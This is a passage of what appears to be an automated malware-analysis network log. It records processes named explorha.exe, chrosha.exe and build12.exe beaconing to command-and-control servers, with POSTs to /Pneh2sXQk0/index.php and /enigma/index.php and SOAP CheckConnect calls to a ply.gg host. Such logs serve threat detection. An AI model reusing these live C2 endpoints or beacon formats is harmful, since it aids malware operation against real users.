                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:44.766058922 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
601 | 192.168.2.5 | 50447 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:44.913885117 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:45.163983107 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
602 | 192.168.2.5 | 50448 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:45.017074108 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:45.268862963 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
603 | 192.168.2.5 | 50449 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:45.413383961 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:45.662151098 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
604 | 192.168.2.5 | 50450 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:45.629239082 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:45.872068882 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
605 | 192.168.2.5 | 50451 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:46.020427942 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:46.263108969 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
606 | 192.168.2.5 | 50452 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:46.127648115 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:46.377650023 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
607 | 192.168.2.5 | 50453 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:46.508724928 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:46.755616903 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
608 | 192.168.2.5 | 50454 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:46.746455908 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:46.996206999 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
609 | 192.168.2.5 | 50455 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:47.120392084 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:47.368988991 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
610 | 192.168.2.5 | 50456 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:47.247963905 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:47.501199007 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
611 | 192.168.2.5 | 50457 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:47.619848013 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:47.870878935 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
612 | 192.168.2.5 | 50458 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:47.869111061 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:48.117096901 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
613 | 192.168.2.5 | 50459 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:48.236463070 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:48.488265991 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
614 | 192.168.2.5 | 50460 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:48.364387989 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:48.607166052 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
615 | 192.168.2.5 | 50462 | 147.185.221.19 | 30946 | 7324 | C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:48.438149929 CEST | 248 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
Apr 19, 2024 03:32:48.899533987 CEST | 385 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Apr 19, 2024 03:34:15.183320999 CEST | 359 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Apr 19, 2024 03:34:15.483335018 CEST | 359 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Apr 19, 2024 03:34:16.083296061 CEST | 359 | IN | HTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 19 Apr 2024 01:34:14 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
616 | 192.168.2.5 | 50461 | 147.185.221.19 | 30946 | 5608 | C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:48.438674927 CEST | 248 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: b-stamps.gl.at.ply.gg:30946
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Apr 19, 2024 03:32:48.944519043 CEST | 385 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: b-stamps.gl.at.ply.gg:30946
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Apr 19, 2024 03:34:15.182094097 CEST | 359 | IN | HTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 19 Apr 2024 01:34:14 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Apr 19, 2024 03:34:15.482045889 CEST | 359 | IN | HTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 19 Apr 2024 01:34:14 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Apr 19, 2024 03:34:16.082120895 CEST | 359 | IN | HTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 19 Apr 2024 01:34:14 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
617 | 192.168.2.5 | 50463 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:48.737719059 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:48.988516092 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
618 | 192.168.2.5 | 50464 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:48.963401079 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:49.210655928 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
619 | 192.168.2.5 | 50465 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:49.343592882 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:49.583327055 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
620    192.168.2.5    50466    193.233.132.56    80    4484    C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp    Bytes transferred    Direction    Data
Apr 19, 2024 03:32:49.463762045 CEST    312    OUT    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
